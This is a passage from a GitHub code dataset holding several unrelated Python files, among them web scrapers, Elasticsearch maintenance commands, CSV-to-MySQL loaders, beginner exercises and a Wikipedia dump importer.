releaser_info['platform']\n releaser = releaser_info['releaser']\n search_body = {\"query\":{\"bool\":{\"filter\":[{\"term\":{\"platform.keyword\":platform}},\n {\"term\":{\"releaser.keyword\":releaser}},\n {\"term\":{\"data_month\":11}},\n {\"term\":{\"data_year\":2018}},\n {\"term\":{\"stats_type.keyword\":\"new_released\"}}]}}}\n\n es_search = es.search(index='releaser', doc_type='releasers',\n body=search_body)\n if es_search['hits']['total'] != 0:\n hits = es_search['hits']['hits'][0]['_source']['video_num']\n releaser_info['Nov_2018'] = int(hits)\n print(\"releaser %s hit %s video in es\" % (releaser, hits))\n else:\n releaser_info['Nov_2018'] = 0\n task_list.remove(line)\n total = 
releaser_info['Nov_2018']\n if total >= 900:\n releaser_info['frequency'] = 9\n print(\"%s frequency is 3\" % releaser_info['releaser'])\n if total >= 300:\n releaser_info['frequency'] = 3\n print(\"%s frequency is 3\" % releaser_info['releaser'])\n count += 1\n else:\n releaser_info['frequency'] = 1\n _id = platform + '_' + releaser\n bulk_head = '{\"index\": {\"_id\":\"%s\"}}' % _id\n releaser_info['timestamp'] = int(time.time() * 1e3)\n data_str = json.dumps(releaser_info, ensure_ascii=False)\n bulk_one_body = bulk_head+'\\n'+data_str+'\\n'\n bulk_all_body += bulk_one_body\n es.bulk(index='target_releasers', doc_type='doc',\n body=bulk_all_body)\n bulk_all_body = ''\n print('write %s into es' % releaser)\n","repo_name":"litaolemo/crawler","sub_path":"crawler_sys/tools/count_releaser_publish_num_and_refresh_crawler_frequency.py","file_name":"count_releaser_publish_num_and_refresh_crawler_frequency.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"1550207852","text":"print('start')\nprint('start one({1}), end({0})'.format('cpy', 'cry'))\n\nnumbers = 1, 2, 3, 4\nL = []\n\n# 逆向遍历\nfor i in range(len(numbers)-1, -1, -1):\n print(numbers[i], end=' ')\n\nprint('\\n', '-'*10)\n\nfor i, v in enumerate(numbers):\n print(i, v)\n\n\ndef composeNumber(numbers):\n for i, v in enumerate(numbers):\n print(f'One for nest index = {i}, value = {v}')\n for j in range(i+1, len(numbers)):\n print(f'tow for nest index = {j}, value = {numbers[j]}')\n for k in range(j+1, len(numbers)):\n print(f'three for nest index = {k}, value = {numbers[k]}')\n print(f'compose i = {i}, j = {j}, k = {k}, lastValue = ' +\n str(v) + str(numbers[j]) + str(numbers[k]))\n L.append(str(v) + str(numbers[j]) + str(numbers[k]))\n L.append(str(v) + str(numbers[k]) + str(numbers[j]))\n L.append(str(numbers[k]) + str(v) + str(numbers[j]))\n L.append(str(numbers[k]) + str(numbers[j]) + str(v))\n L.append(str(numbers[j]) + str(numbers[k]) + str(v))\n L.append(str(numbers[j]) + str(v) + str(numbers[k]))\n\n\ncomposeNumber(numbers)\n\nfor i, v in enumerate(L):\n print(f'==== {v}')\n\n\nprices = [1, 2, 4, 5]\npt = [[0 for _ in range(2)] for i in prices]\npt2 = [[0] for _ in range(2) for i in prices]\npt3 = [[[0 for _ in range(2)] for _ in range(2)] for i in prices]\nprint(pt)\nprint(pt2)\nprint(pt3)\n\n\nword1 = 'workd1'\nfor i in word1[:3]:\n print(i)\n\nfor i in range(1, 3):\n print(i)\n","repo_name":"PykeChen/pythonBasicGramer","sub_path":"For.py","file_name":"For.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30299257536","text":"# -*- coding:utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport urllib\nimport http.cookiejar\nimport re\nimport sys\nimport string\nimport threading\nimport queue\nimport os\nimport re\nimport pickle\nimport time\nimport json\nfrom pymysql import *\nfrom pymongo import *\nfrom bson.objectid import ObjectId\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef get_page(url, browser):\n browser.get(url)\n rules = re.compile(r'.*/list/.*')\n # 向下拖动至底端\n if 
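composeNumber() in For.py enumerates every ordered 3-digit arrangement by hand, with three nested index loops plus six explicit append calls per combination. itertools.permutations expresses the same enumeration directly:

from itertools import permutations

numbers = (1, 2, 3, 4)
L = ["".join(map(str, p)) for p in permutations(numbers, 3)]
print(len(L), L[:3])  # 24 ordered triples (P(4, 3) = 4 * 3 * 2): '123', '124', '132', ...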
rules.match(str(browser.current_url)):\n        js = \"var q=document.documentElement.scrollTop=10000\"\n        browser.execute_script(js)\n        time.sleep(0.2)\n        browser.execute_script(js)\n        time.sleep(0.2)\n    time.sleep(0.5)\n    content = browser.page_source\n    return content\n\n\ndef rollpage(browser):\n    try:\n        next_btn = browser.find_element_by_xpath('//div[@class=\"icon icon-page-next\"]')\n    except:\n        next_btn = None  # reached the last page\n\n    if next_btn is not None:\n        next_btn.click()\n        time.sleep(0.4)\n        return True\n    else:\n        return False\n\n\ndef get_searchpage_links(page, content):\n    links = []\n    rules = re.compile(r'.*/content/.*')\n    soup = BeautifulSoup(content, features='html.parser')\n    for i in soup.findAll('a', {'class': 'show-items sa_entrance'}):\n        currurl = str(i.get('href', ''))\n        modifiedurl = urllib.parse.urljoin(page, currurl)\n        if not rules.match(str(modifiedurl)):\n            continue\n        if urllib.parse.urlparse(modifiedurl).scheme not in ('http', 'https'):\n            continue\n        links.append(modifiedurl)\n    return links\n\n\ndef split_time_addr(title_ele_content):\n    rule1 = re.compile(r'[0-9]{4}.[0-9]{2}.[0-9]{2}-[0-9]{4}.[0-9]{2}.[0-9]{2}')\n    rule2 = re.compile(r'[0-9]{4}.[0-9]{2}.[0-9]{2}')\n    rule3 = re.compile(r'[0-9]{2}:[0-9]{2}')\n    str_list = title_ele_content.split()\n    str_len = len(str_list)\n    title_time_content = 'None'\n    place = 'None'\n    if str_list[str_len - 1] == '查看座位图':\n        del(str_list[str_len - 1])\n        str_len -= 1\n    if rule1.match(str_list[0]):\n        place = ''\n        title_time_content = str_list[0]\n        for i in range(str_len - 1):\n            place = place + str_list[i + 1] + ' '\n    elif rule2.match(str_list[0]):\n        place = ''\n        if rule3.match(str_list[1]):\n            title_time_content = str_list[0] + ' ' + str_list[1]\n            for i in range(str_len - 2):\n                place = place + str_list[i + 2] + ' '\n        else:\n            title_time_content = str_list[0]\n            for i in range(str_len - 1):\n                place = place + str_list[i + 1]\n    else:\n        title_time_content = 'None'\n        place = 'None'\n    return [title_time_content, place]\n\n\ndef split_time(time_str):\n    rule1 = re.compile(r'-[0-9]{4}\\.[0-9]{2}\\.[0-9]{2}')\n    rule2 = re.compile(r'[0-9]{2}:[0-9]{2}')\n    start_date = '0000-00-00'\n    end_date = start_date\n    if rule1.search(time_str):\n        start_date = time_str[:10].replace('.', '-')\n        end_date = time_str[11:].replace('.', '-')\n    elif rule2.search(time_str):\n        start_date = time_str[:10].replace('.', '-')\n        end_date = start_date\n    return [start_date, end_date]\n\n\ndef split_price(price_str):\n    rule = re.compile(r'[0-9]+\\.?[0-9]*')\n    m = rule.search(price_str)\n    if m:\n        return float(m.group(0))\n    else:\n        return 0\n\n\ndef get_ticket_info(soup):\n    # performance time\n    perform_time = soup.find('div', {'id': 'session-container'})\n    if perform_time is None:\n        perform_time_content = 'Unknown'\n    else:\n        perform_time_content = str(perform_time.find('div', {'class': 'normal-list-item list-one active'}).get('data-time'))\n\n    # ticket types and prices\n    tickets = []\n    tickets_container = soup.find('div', {'id': 'sessionPar-container'})\n    if tickets_container is not None:\n        for i in tickets_container.findAll('div'):\n            price = str(i.get('data-price'))\n            seatname = str(i.get('data-seatname'))\n            comments = str(i.get('data-comments'))\n            if seatname == 'None':\n                seatname = ''\n            if comments == 'None':\n                comments = ''\n            ticket_text = seatname + ' ' + comments\n            ticket_status = i.i\n            if ticket_status is None:\n                ticket_status_text = 'None'\n            else:\n                ticket_status_text = ticket_status.get_text()\n            obj = {\n                'price': price,  # actual price, no parsing needed\n                'label': ticket_text,  # the text actually shown on the div\n                'status': ticket_status_text  # '暂缺' (temporarily sold out) or None\n            }\n            
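split_time() above slices the date range at fixed character offsets after probing with two regexes; a single pattern with optional groups covers both forms. Note this sketch treats a bare 'YYYY.MM.DD' as a one-day range, whereas the original leaves a date without an HH:MM part at the '0000-00-00' defaults:

import re

def split_time_re(time_str):
    m = re.match(r"(\d{4})\.(\d{2})\.(\d{2})(?:-(\d{4})\.(\d{2})\.(\d{2}))?", time_str)
    if not m:
        return ['0000-00-00', '0000-00-00']
    start = '-'.join(m.group(1, 2, 3))
    end = '-'.join(m.group(4, 5, 6)) if m.group(4) else start
    return [start, end]

print(split_time_re('2019.01.02-2019.03.04'))  # ['2019-01-02', '2019-03-04']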
tickets.append(obj)\n return {\n 'time': perform_time_content,\n 'price': tickets\n }\n\n\ndef analysis_detailpage(page, content, browser):\n global data\n soup = BeautifulSoup(content, features='html.parser')\n # 图片\n image = soup.find('div', {'class': 'show-poster'})\n if image is None:\n image_url = 'None'\n else:\n image_url = str(image.a.img.get('src', ''))\n # 标题\n title = soup.find('div', {'class': 'show-title'})\n if title is None:\n title_content = 'None'\n else:\n title_content = str(title.span.get_text())\n # 标题时间 & 地点\n title_ele = soup.find('div', {'class': 'show-address'})\n if title_ele is None:\n title_ele_content = 'None'\n title_time_content = 'None'\n place = 'None'\n else:\n title_ele_content = str(title_ele.get_text()).replace('\\n', '').strip()\n time_addr = split_time_addr(title_ele_content)\n title_time_content = time_addr[0]\n place = time_addr[1]\n # 演出详细信息\n detail = soup.find('div', {'id': 'intro_panel'})\n if detail is None:\n detail_content = 'None'\n else:\n detail_content = str(detail).replace(u'\\xa0', u'').replace('\\n', '')\n # 组装演出信息\n date = split_time(title_time_content)\n raw_data = {\n 'name': title_content,\n 'image': image_url,\n 'start_date': date[0],\n 'end_date': date[1],\n 'address': place,\n 'website': str(page),\n 'goods_type': performance_type,\n 'detail': detail_content,\n 'tickets': []\n }\n\n # 遍历所有场次 获得每种场次票务信息\n try:\n father = browser.find_element_by_xpath('//div[@id=\"session-container\"]')\n except: # 遇到演出取消\n if dataLock.acquire():\n data.append(raw_data)\n dataLock.release()\n print('演出取消!')\n return\n \n for i in father.find_elements_by_xpath('./ul/li/div'):\n try:\n i.click()\n time.sleep(0.15)\n except:\n print('CLICK ERROR!')\n content = browser.page_source\n soup = BeautifulSoup(content, features='html.parser')\n ticket_obj = get_ticket_info(soup)\n raw_data['tickets'].append(ticket_obj)\n\n if dataLock.acquire():\n data.append(raw_data)\n dataLock.release() \n\n\ndef save_data():\n mysql_conn = connect(\n host='localhost',\n port=3306,\n user='root',\n password='root',\n database='jupiter_update',\n charset='utf8'\n )\n mysql_cur = mysql_conn.cursor()\n\n mongo_conn = MongoClient('mongodb://localhost:27017/')\n mongo_conn.jupiter_test.authenticate('root', '123456', mechanism='SCRAM-SHA-1')\n mongo_db = mongo_conn['jupiter']\n collection = mongo_db['goodsdetail']\n\n find_max = 'select max(goods_id) from goods'\n for i in range(len(data)):\n goods_insert_sql = 'insert into goods VALUES(null, \\\"' + \\\n data[i]['name'] + '\\\", \\\"' + \\\n data[i]['start_date'] + '\\\", \\\"' + \\\n data[i]['end_date'] + '\\\", \\\"' + \\\n data[i]['address'] + '\\\", \\\"' + \\\n data[i]['website'] + '\\\", ' + \\\n str(data[i]['goods_type']) + ', \\\"' + \\\n data[i]['image'] + '\\\", 0, 0)'\n try:\n mysql_cur.execute(goods_insert_sql)\n mysql_cur.execute(find_max)\n max_goodsid = int(mysql_cur.fetchone()[0])\n except:\n print(goods_insert_sql)\n continue\n\n document = {'goods_id': max_goodsid, 'detail': data[i]['detail']}\n try:\n collection.insert_one(document=document)\n except:\n print('ERROR IN MongoDB!')\n continue\n\n tickets = data[i]['tickets']\n for ticket_index in range(len(tickets)):\n price = tickets[ticket_index]['price']\n ticket_time = tickets[ticket_index]['time']\n\n for price_index in range(len(price)):\n if price[price_index]['status'] == '暂缺':\n status = 0 # 缺票\n else:\n status = 1 # 有票\n ticket_insert_sql = 'insert into goodsdetail VALUES(null, ' + \\\n str(max_goodsid) + ', ' + \\\n str(price[price_index]['price']) 
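save_data() above assembles its INSERT statements by concatenating values into the SQL string, which breaks on names containing quotes (the try/except around each execute hints at that) and is injection-prone. pymysql's cursor accepts placeholder parameters instead; a sketch of the goods insert, assuming a live cursor and one scraped raw_data dict:

def insert_goods(cursor, raw):
    # %s placeholders: the driver quotes and escapes every value itself
    sql = "INSERT INTO goods VALUES (null, %s, %s, %s, %s, %s, %s, %s, 0, 0)"
    cursor.execute(sql, (raw['name'], raw['start_date'], raw['end_date'],
                         raw['address'], raw['website'], raw['goods_type'],
                         raw['image']))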
+ ', ' + \\\n str(status) + ', \\\"' + \\\n ticket_time + '\\\", \\\"' + \\\n price[price_index]['label'] + '\\\")'\n try:\n mysql_cur.execute(ticket_insert_sql)\n except:\n print(ticket_insert_sql)\n continue\n mysql_conn.commit()\n mysql_cur.close()\n mysql_conn.close()\n \n\n\ndef do_nothing():\n return \n\n\ndef working(flag, count, n):\n global NUM\n option = webdriver.ChromeOptions()\n browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\", options=option)\n rules = re.compile(r'.*/list/.*')\n\n while flag:\n page = q.get()\n if page == '-':\n count += 1\n if count >= maxpage:\n flag = False\n continue\n if page not in crawled:\n try:\n content = get_page(page, browser)\n except urllib.error.HTTPError:\n continue\n print('I am thread', n, page)\n count += 1\n if count >= maxpage:\n flag = False\n if False: # 主页\n outlinks = []\n for link in outlinks:\n q.put(link)\n elif rules.match(str(page)): # 搜索页\n while True:\n outlinks = get_searchpage_links(page, content)\n for link in outlinks:\n q.put(link)\n if not rollpage(browser):\n break\n js = \"var q=document.documentElement.scrollTop=10000\"\n browser.execute_script(js)\n time.sleep(0.2)\n browser.execute_script(js)\n time.sleep(0.2)\n content = browser.page_source\n for i in range(50):\n q.put('-') # 填充用的\n else: # 票务详情页\n analysis_detailpage(page, content, browser)\n # do_nothing()\n \n if varLock.acquire():\n crawled.append(page)\n varLock.release()\n if countLock.acquire():\n NUM = NUM - 1\n countLock.release()\n if NUM == 0:\n save_data()\n\n\nif __name__ == '__main__':\n flag = True\n count = 0\n maxpage = 3\n NUM = 4\n performance_type = 6 # 演出类型\n seed = 'https://www.moretickets.com/list/3205-dance/hottest'\n varLock = threading.Lock()\n dataLock = threading.Lock()\n countLock = threading.Lock()\n q = queue.Queue()\n crawled = []\n threads = []\n data = [] # 演出json数据\n q.put(seed)\n \n for i in range(NUM):\n t = threading.Thread(target = working, args = (flag, count, i))\n t.setDaemon(True)\n threads.append(t)\n\n # start each thread\n mark = True\n for t in threads:\n t.start()\n \n # join threads\n for t in threads:\n t.join()\n\n ","repo_name":"SJTUSummerProj2020/Jupiter","sub_path":"crawl/crawl_moretickets.py","file_name":"crawl_moretickets.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"347371753","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport elasticsearch.exceptions\nimport elasticsearch_dsl\n\nfrom pyjobsweb import model\nfrom pyjobsweb.commands import AppContextCommand\nfrom pyjobsweb.lib.lock import acquire_inter_process_lock\n\n\nclass PurgeESCommand(AppContextCommand):\n \"\"\"\n Purge Elasticsearch indixes by dropping and re-creating them\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(PurgeESCommand, self).__init__(args, kwargs)\n self._logger = logging.getLogger(__name__)\n\n def get_parser(self, prog_name):\n parser = super(PurgeESCommand, self).get_parser(prog_name)\n\n jobs_help_msg = 'purges the jobs index of the elasticsearch database'\n parser.add_argument('-j', '--jobs',\n help=jobs_help_msg,\n dest='purge_jobs_index',\n action='store_const', const=True)\n\n companies_help_msg = 'purges the companies index of the elasticsearch' \\\n 'database'\n parser.add_argument('-co', '--companies',\n help=companies_help_msg,\n dest='purge_companies_index',\n action='store_const', const=True)\n\n geocomplete_help_msg = \\\n 'purges the 
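working() above coordinates the crawler threads through a shared queue.Queue and pads the queue with '-' filler items so every thread can keep counting toward the page budget. A compact standard alternative for shutting workers down is one sentinel per thread:

import queue
import threading

def worker(q, results):
    while True:
        item = q.get()
        if item is None:   # sentinel: one per worker, instead of '-' fillers
            break
        results.append(item * 2)

q, results = queue.Queue(), []
threads = [threading.Thread(target=worker, args=(q, results)) for _ in range(4)]
for t in threads:
    t.start()
for i in range(10):
    q.put(i)
for _ in threads:
    q.put(None)
for t in threads:
    t.join()
print(sorted(results))  # [0, 2, 4, ..., 18]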
geocomplete index of the elasticsearch database'\n parser.add_argument('-g', '--geocomplete',\n help=geocomplete_help_msg,\n dest='purge_geocomplete_index',\n action='store_const', const=True)\n\n return parser\n\n def _logging(self, logging_level, message):\n self._logger.log(logging_level, message)\n\n def _perform_index_purge(self, index_name, index_settings, doc_type_class):\n log_msg = 'Dropping %s index.' % index_name\n self._logging(logging.INFO, log_msg)\n\n index = elasticsearch_dsl.Index(index_name)\n index.settings(**index_settings)\n index.doc_type(doc_type_class)\n\n try:\n index.delete(ignore=404)\n index.create()\n except elasticsearch.exceptions.ElasticsearchException as e:\n log_msg = 'Error while dropping %s index: %s.' % (index_name, e)\n self._logging(logging.ERROR, log_msg)\n return\n\n log_msg = 'Index %s has been dropped successfully.' % index_name\n self._logging(logging.INFO, log_msg)\n\n def _purge_index(self, index_name, index_settings, doc_type_class):\n log_msg = 'Purging index %s.' % index_name\n self._logging(logging.INFO, log_msg)\n\n with acquire_inter_process_lock('purge_%s' % index_name) as acquired:\n if not acquired:\n err_msg = 'Another process is already purging the %s ' \\\n 'index, aborting now.' % index_name\n self._logging(logging.WARNING, err_msg)\n else:\n self._perform_index_purge(index_name,\n index_settings, doc_type_class)\n\n def _perform_sync_reset(self, sqlalchemy_table_class):\n # Update the Postgresql database\n table_name = sqlalchemy_table_class.__tablename__\n\n log_msg = 'Resetting Postgresql %s table sync data.' % table_name\n self._logging(logging.INFO, log_msg)\n\n sqlalchemy_table_class.reset_last_sync()\n\n log_msg = 'Postgresql %s table sync data successfully reset.' \\\n % table_name\n self._logging(logging.INFO, log_msg)\n\n def _reset_sync(self, index_name, sqlalchemy_table_class):\n err_msg = 'Resetting synchronization data for index %s.' % index_name\n self._logging(logging.WARNING, err_msg)\n\n with acquire_inter_process_lock('purge_%s' % index_name) as acquired:\n if not acquired:\n err_msg = 'Another process is already resetting the %s ' \\\n 'index synchronization data, aborting now.' 
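acquire_inter_process_lock() is pyjobs' own helper and its body is not shown here. One common way to build such a yes/no context manager on Unix is a non-blocking flock on a lock file; the following is purely illustrative, not the project's actual code:

import fcntl
import os
from contextlib import contextmanager

@contextmanager
def file_lock(name, lock_dir='/tmp'):
    fd = os.open(os.path.join(lock_dir, name + '.lock'), os.O_CREAT | os.O_RDWR)
    try:
        try:
            fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)  # fail fast if already held
            acquired = True
        except OSError:
            acquired = False
        yield acquired
    finally:
        os.close(fd)  # closing the descriptor also releases the lock if it was held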
\\\n % index_name\n self._logging(logging.WARNING, err_msg)\n else:\n self._perform_sync_reset(sqlalchemy_table_class)\n\n def purge_jobs_index(self):\n index_name = model.JobElastic().index\n self._purge_index(index_name, dict(), model.JobElastic)\n self._reset_sync(index_name, model.JobAlchemy)\n\n def purge_companies_index(self):\n index_name = model.CompanyElastic().index\n self._purge_index(index_name, dict(), model.CompanyElastic)\n self._reset_sync(index_name, model.CompanyAlchemy)\n\n def purge_geocomplete_index(self):\n index_name = model.Geocomplete().index\n self._purge_index(index_name, dict(), model.Geocomplete)\n\n def take_action(self, parsed_args):\n super(PurgeESCommand, self).take_action(parsed_args)\n\n if parsed_args.purge_jobs_index:\n self.purge_jobs_index()\n\n if parsed_args.purge_companies_index:\n self.purge_companies_index()\n\n if parsed_args.purge_geocomplete_index:\n self.purge_geocomplete_index()","repo_name":"pyjobs/web","sub_path":"pyjobs_web/pyjobsweb/commands/purge_es.py","file_name":"purge_es.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"1795369245","text":"\"\"\"A+B-8\"\"\"\n\n# 테스트 케이스 개수 T 입력\nT = int(input())\n\n# 저장 리스트 선언\nstore = []\n\n# 테스트 케이스 개수만큼 숫자 2개 입력받아 저장\nfor i in range(T):\n store.append(input())\n\n# 입력받은 수를 a, b로 나누어 각 테스트 케이스마다 \"Case #x: A + B = C\" 형식으로 출력\nfor i in range(T):\n a, b = map(int, store[i].split())\n print('Case #{}: {} + {} = {}'.format(i+1, a, b, a + b))","repo_name":"davemins/algorithm-boj","sub_path":"03_반복문/11022.py","file_name":"11022.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5298187544","text":"\"\"\"Unit tests for the durable functions library\"\"\"\nimport os\nimport sys\nimport unittest\n\n\ndef suite():\n \"\"\"\n\n :return: configuration for the suite of tests\n \"\"\"\n test_loader = unittest.TestLoader()\n test_suite = test_loader.discover(\n os.path.dirname(__file__), pattern='test_*.py')\n return test_suite\n\n\nif __name__ == '__main__':\n runner = unittest.runner.TextTestRunner()\n result = runner.run(suite())\n sys.exit(not result.wasSuccessful())\n","repo_name":"Azure/azure-functions-durable-python","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"52"} +{"seq_id":"4232603223","text":"import mysql.connector\nimport pandas as pd\nimport numpy as np\n#Connect database\ndb = mysql.connector.connect(\n user='root',\n password='123123',\n host='localhost',\n database='customer',\n autocommit=True\n)\ncursor = db.cursor()\n\n#Read file csv\ndata = pd.read_csv(\"customer.csv\")\n\n#Handling data None\ndata = data.replace({np.nan: None})\ndata_tuples = data.itertuples()\n\ndef create_table():\n name = [i for i in data]\n type = [i for i in data.dtypes]\n query = \"CREATE TABLE customers(\"\n for i in range(len(name)):\n if type[i]==\"int64\":\n query += name[i]\n query += \" int(10),\"\n elif type[i]==\"object\":\n query += name[i]\n query += \" varchar(100),\"\n else:\n pass\n query = query[:-1]\n query += \");\"\n # print(query)\n cursor.execute(query)\n\ndef insert_data_into_table():\n sql = \"INSERT INTO customers VALUE(\"\n for column in data:\n sql += \"%s,\"\n sql = sql[:-1]\n sql += \");\"\n for row in data_tuples:\n 
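create_table() in add_database.py above derives a CREATE TABLE statement from the DataFrame's dtypes through index-based string assembly. The same mapping reads more directly as a dict over df.dtypes.items(), with the same two supported column types as the original:

import pandas as pd

TYPE_MAP = {'int64': 'INT(10)', 'object': 'VARCHAR(100)'}

def build_create_table(df, table):
    cols = ', '.join('%s %s' % (name, TYPE_MAP[str(dtype)])
                     for name, dtype in df.dtypes.items()
                     if str(dtype) in TYPE_MAP)
    return 'CREATE TABLE %s(%s);' % (table, cols)

print(build_create_table(pd.DataFrame({'id': [1], 'name': ['a']}), 'customers'))
# CREATE TABLE customers(id INT(10), name VARCHAR(100));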
cursor.execute(sql,row[1::])\n\nif __name__ == '__main__':\n create_table()\n insert_data_into_table()\n","repo_name":"huskyloveme/litc_algorithms","sub_path":"2/add_database.py","file_name":"add_database.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14239543274","text":"import glob\nimport json\nimport re\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime\nimport os.path\n\nfrom tqdm import tqdm\n\nimport click\nfrom flask.cli import with_appcontext\n\nfrom .db import get_db\nfrom WHParallelParser import WHParallelParser\nimport mwparallelparser\n\n\n@click.command('import-enterprise-dump')\n@click.argument('lang')\n@click.argument('dump_date')\n@click.argument('dump_path')\n@click.option('-e', '--early-stopping', type=int, default=-1, help='stop dump parsing after -e articles. -1 means no '\n 'early stopping.')\n@click.option('-d', '--dump-id', type=int, default=-1, help='continue the import for a specified dump id')\n@click.option('-g', '--ground-truth-id', type=int, default=-1, help='continue the import for a specified ground truth')\n@click.option('-s', '--start-step', type=int, default=1, help='continue the import from a specified step')\n@with_appcontext\ndef import_enterprise_dump_command(lang, dump_date, dump_path, early_stopping, dump_id, ground_truth_id, start_step):\n filename_metadata = f'{lang}wiki-{dump_date}-enterprise-metadata.json'\n\n homedir = os.path.expanduser(\"~/\")\n if homedir == \"~/\":\n raise ValueError('could not find a default download directory')\n\n download_dir = os.path.join(homedir, 'wikigold_data')\n if not os.path.exists(download_dir):\n os.mkdir(download_dir)\n\n filepath_metadata = os.path.join(download_dir, filename_metadata)\n\n db = get_db()\n cursor = db.cursor()\n\n sql_charter_maximum_length = '''SELECT character_maximum_length FROM information_schema.columns \n WHERE table_name = %s AND column_name = %s'''\n cursor.execute(sql_charter_maximum_length, ('articles', 'title'))\n title_maximum_length = cursor.fetchone()[0]\n\n cursor.execute(sql_charter_maximum_length, ('lines', 'content'))\n line_content_maximum_length = cursor.fetchone()[0]\n\n cursor.execute(sql_charter_maximum_length, ('labels', 'label'))\n label_maximum_length = cursor.fetchone()[0]\n\n if dump_id == -1:\n parser_name = mwparallelparser.__name__\n parser_version = mwparallelparser.__version__\n sql_add_dump = \"INSERT INTO dumps (`lang`, `name`, `parser_name`, `parser_version`, `timestamp`) VALUES (%s, %s, %s, %s, %s)\"\n name = f'{lang}wiki-{dump_date}'\n data_dump = (lang, name, parser_name, parser_version, datetime.now().isoformat())\n cursor.execute(sql_add_dump, data_dump)\n dump_id = cursor.lastrowid\n\n sql_add_ground_truth = \"INSERT INTO ground_truth (`name`, `description`, `dump_id`, `knowledge_base_id`) VALUES (%s, %s, %s, %s)\"\n data_ground_truth = (\"wikipedia\", \"Links created by Wikipedia contributors.\", dump_id, dump_id)\n cursor.execute(sql_add_ground_truth, data_ground_truth)\n ground_truth_id = cursor.lastrowid\n\n db.commit() # save dump into database\n\n def step_1():\n print(f'step 1. 
processing dump...')\n\n dump_filepaths = sorted(glob.glob(os.path.join(dump_path, '*.ndjson')),\n key=lambda fn: int(re.sub(r'[^0-9]', '', fn)))\n dump_filenames = [os.path.basename(filepath) for filepath in dump_filepaths]\n\n if not os.path.exists(filepath_metadata):\n print('collecting metadata ...')\n articles_counter = {}\n for filename in dump_filenames:\n print(f'counting articles in {filename}...')\n articles_counter[filename] = 0\n filepath = os.path.join(dump_path, filename)\n with open(filepath) as fp:\n for line in fp:\n articles_counter[filename] += 1\n\n metadata = {'articles_counter': articles_counter}\n with open(filepath_metadata, 'w') as file:\n json.dump(metadata, file)\n print('done')\n else:\n print(f'loading metadata from: {filename_metadata}')\n with open(filepath_metadata, 'r') as file:\n metadata = json.load(file)\n\n sql_add_article = \"INSERT INTO `articles` (`title`, `caption`, `dump_id`) VALUES (%s, %s, %s)\"\n sql_add_article_redirect = \"INSERT INTO `articles` (`title`, `redirect_to_title`, `dump_id`) VALUES (%s, %s, %s)\"\n\n sql_add_line = \"INSERT INTO `lines` (`article_id`, `nr`, `content`) VALUES (%s, %s, %s)\"\n sql_add_ground_truth_decisions = '''INSERT INTO `ground_truth_decisions`\n (`source_article_id`, `source_line_id`, `start`, `length`, `label`, `destination_title`, `ground_truth_id`) VALUES (%s, %s, %s, %s, %s, %s, %s)'''\n\n parser = WHParallelParser()\n\n def process_article(article):\n title = article['name']\n if len(title) > title_maximum_length:\n print(f\"title '{article[:title_maximum_length]}...' exceeds maximum length ({title_maximum_length})\")\n return\n\n # parse article before processing redirects\n try:\n article_parsed = parser.parse_html(article['article_body']['html'])\n except Exception:\n print(f'{title}: parser error')\n return\n\n if 'redirects' in article:\n for redirect in article['redirects']:\n data_article_redirect = (redirect['name'], article['name'], dump_id)\n cursor.execute(sql_add_article_redirect, data_article_redirect)\n\n try:\n caption = article_parsed.text[0]\n except IndexError:\n caption = None\n data_article = (title, caption, dump_id)\n cursor.execute(sql_add_article, data_article)\n article_id = cursor.lastrowid\n\n wikipedia_decisions = defaultdict(list)\n for tag in article_parsed.data:\n if tag['tag'] == 'a' and 'rel' in tag['attrs'] and 'mw:WikiLink' in tag['attrs']['rel'] \\\n and 'title' in tag['attrs'] and ':' not in tag['attrs']['title']: # filtrowanie tylko linków Wikipedii\n if tag['start'][0] != tag['end'][0]:\n print(f'{title}: multiline links not supported')\n continue\n line = tag['start'][0]\n length = tag['end'][1] - tag['start'][1] + 1\n link = {\n 'start': tag['start'][1],\n 'length': length,\n 'destination': tag['attrs']['title'],\n }\n link['label'] = article_parsed.text[line][link['start']:link['start'] + link['length']]\n wikipedia_decisions[line].append(link)\n\n for line_nr, content in enumerate(article_parsed.text):\n if len(content) > line_content_maximum_length:\n print(\n f\"line {article['name']}({line_nr}): '{content[:50]}...' exceeds maximum length ({line_content_maximum_length})\")\n continue\n data_line = (article_id, line_nr, content)\n cursor.execute(sql_add_line, data_line)\n line_id = cursor.lastrowid\n if line_nr in wikipedia_decisions:\n for link in wikipedia_decisions[line_nr]:\n label = link['label']\n if len(label) > label_maximum_length:\n print(\n f\"label {label} in {article['name']}({line_nr}): '{label[:label_maximum_length]}...' 
